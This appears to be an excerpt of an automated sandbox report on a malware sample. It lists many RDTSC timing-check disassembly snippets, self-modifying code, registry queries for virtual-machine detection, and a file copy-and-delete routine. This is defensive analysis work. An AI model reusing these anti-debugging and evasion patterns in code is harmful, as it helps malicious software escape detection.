              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A10EA second address: 8A10F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A9CAB second address: 8A9CB6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007FE8A076DDC6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A9CB6 second address: 8A9CF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE8A0813DB6h 0x00000009 popad 0x0000000a jmp 00007FE8A0813DB7h 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jg 00007FE8A0813DACh 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A7E73 second address: 8A7E8A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE8A076DDD0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A82B6 second address: 8A82DA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE8A0813DB7h 0x00000007 js 00007FE8A0813DA6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A861F second address: 8A8623 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A8623 second address: 8A863A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE8A0813DAEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A863A second address: 8A8645 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A8645 second address: 8A864B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A864B second address: 8A8650 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A8977 second address: 8A898A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE8A0813DABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A898A second address: 8A89C3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 je 00007FE8A076DDC6h 0x0000000d js 00007FE8A076DDC6h 0x00000013 popad 0x00000014 pushad 0x00000015 jmp 00007FE8A076DDD0h 0x0000001a jns 00007FE8A076DDC6h 0x00000020 popad 0x00000021 popad 0x00000022 push eax 0x00000023 jnl 00007FE8A076DDC8h 0x00000029 pushad 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A8C75 second address: 8A8C8B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FE8A0813DADh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A9482 second address: 8A9486 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A9486 second address: 8A94C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FE8A0813DB0h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c jng 00007FE8A0813DC8h 0x00000012 pushad 0x00000013 jmp 00007FE8A0813DB4h 0x00000018 jl 00007FE8A0813DA6h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B1BB9 second address: 8B1BBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B1D13 second address: 8B1D1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007FE8A0813DA6h 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B1E3C second address: 8B1E42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B1E42 second address: 8B1E46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B1E46 second address: 8B1E5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 ja 00007FE8A076DDD2h 0x0000000c jo 00007FE8A076DDC6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B1E5A second address: 8B1E5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B1E5E second address: 8B1E64 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B1E64 second address: 8B1E68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B1E68 second address: 8B1E7A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a ja 00007FE8A076DDC6h 0x00000010 push edx 0x00000011 pop edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B1E7A second address: 8B1E80 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B1E80 second address: 8B1E91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jno 00007FE8A076DDF4h 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B2163 second address: 8B2177 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnp 00007FE8A0813DA6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 pop eax 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BAD6A second address: 8BAD6E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B8EC1 second address: 8B8EDB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FE8A0813DACh 0x00000008 jns 00007FE8A0813DA6h 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B9353 second address: 8B9359 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B9783 second address: 8B9787 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B9787 second address: 8B97BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FE8A076DDC6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007FE8A076DDCDh 0x00000012 pushad 0x00000013 popad 0x00000014 jmp 00007FE8A076DDD8h 0x00000019 popad 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B97BC second address: 8B97E3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jc 00007FE8A0813DA6h 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FE8A0813DB9h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B97E3 second address: 8B97E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B9A4C second address: 8B9A5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop eax 0x00000007 pop esi 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b jl 00007FE8A0813DA6h 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B9A5D second address: 8B9A61 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B9A61 second address: 8B9A67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B9A67 second address: 8B9A71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B9A71 second address: 8B9A80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE8A0813DABh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B9A80 second address: 8B9AAE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE8A076DDD8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jns 00007FE8A076DDC6h 0x00000011 jmp 00007FE8A076DDCAh 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BA459 second address: 8BA461 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BA461 second address: 8BA469 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D0F0F second address: 8D0F25 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a je 00007FE8A0813DA6h 0x00000010 jl 00007FE8A0813DA6h 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D3114 second address: 8D3119 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D79EE second address: 8D79F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D79F2 second address: 8D79F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D79F6 second address: 8D7A10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE8A0813DB0h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D7A10 second address: 8D7A16 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D7A16 second address: 8D7A1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E13D5 second address: 8E13D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E13D9 second address: 8E13EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FE8A0813DA6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f jns 00007FE8A0813DA6h 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E13EE second address: 8E1407 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE8A076DDCBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pop edx 0x0000000d jnc 00007FE8A076DDC6h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E1407 second address: 8E140B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E2C64 second address: 8E2C7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FE8A076DDD2h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8EBF28 second address: 8EBF2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8EBF2D second address: 8EBF4C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE8A076DDD4h 0x00000007 pushad 0x00000008 jp 00007FE8A076DDC6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8EACF9 second address: 8EAD16 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007FE8A0813DB8h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8EB0E8 second address: 8EB0EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8EBCB8 second address: 8EBCBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8EEA66 second address: 8EEA91 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FE8A076DDC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FE8A076DDCBh 0x0000000f jng 00007FE8A076DDC8h 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FE8A076DDCBh 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F01F1 second address: 8F01FA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push edx 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F0088 second address: 8F0092 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FE8A076DDE5h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F0092 second address: 8F00B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE8A0813DB9h 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F00B2 second address: 8F00B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F3F08 second address: 8F3F18 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007FE8A0813DA6h 0x0000000a jg 00007FE8A0813DA6h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80616B second address: 806171 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 806171 second address: 806175 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90D626 second address: 90D650 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push ebx 0x00000007 jmp 00007FE8A076DDD3h 0x0000000c pop ebx 0x0000000d je 00007FE8A076DDCCh 0x00000013 jg 00007FE8A076DDC6h 0x00000019 push ebx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90D7A9 second address: 90D7B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90D7B1 second address: 90D7E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FE8A076DDCFh 0x0000000a pushad 0x0000000b push ecx 0x0000000c jmp 00007FE8A076DDD5h 0x00000011 pop ecx 0x00000012 pushad 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 923ED4 second address: 923EEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FE8A0813DA6h 0x0000000a jne 00007FE8A0813DA6h 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 push esi 0x00000016 pop esi 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 923EEB second address: 923EFE instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b jl 00007FE8A076DDC6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 923EFE second address: 923F04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 923F04 second address: 923F12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FE8A076DDC6h 0x0000000a popad 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 923F12 second address: 923F33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FE8A0813DB4h 0x0000000c jnc 00007FE8A0813DA6h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 923238 second address: 923272 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE8A076DDD8h 0x00000009 js 00007FE8A076DDC6h 0x0000000f jmp 00007FE8A076DDD7h 0x00000014 popad 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 923272 second address: 92327E instructions: 0x00000000 rdtsc 0x00000002 jng 00007FE8A0813DAEh 0x00000008 push edi 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9237B8 second address: 9237CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FE8A076DDC6h 0x0000000a popad 0x0000000b jo 00007FE8A076DDCCh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 923AAC second address: 923AB0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 923AB0 second address: 923AB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 926CFD second address: 926D21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 jmp 00007FE8A0813DAEh 0x0000000c popad 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 push eax 0x00000012 push edx 0x00000013 jnc 00007FE8A0813DA8h 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 926D21 second address: 926D2B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007FE8A076DDC6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5300256 second address: 5300265 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE8A0813DABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5300265 second address: 530027D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE8A076DDD4h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 530027D second address: 5300281 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53002CE second address: 53002D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov al, 08h 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53002D5 second address: 53002F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE8A0813DB7h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 844406 second address: 84440F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84440F second address: 844413 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Tries to evade debugger and weak emulator (self modifying code)
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 68FAC3 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 83382F instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 8C7664 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
              Source: C:\Users\user\Desktop\file.exeEvaded block: after key decisiongraph_0-27166
              Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetSystemTime,DecisionNodesgraph_0-25984
              Source: C:\Users\user\Desktop\file.exeAPI coverage: 4.8 %
              Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004518A0 lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_004518A0
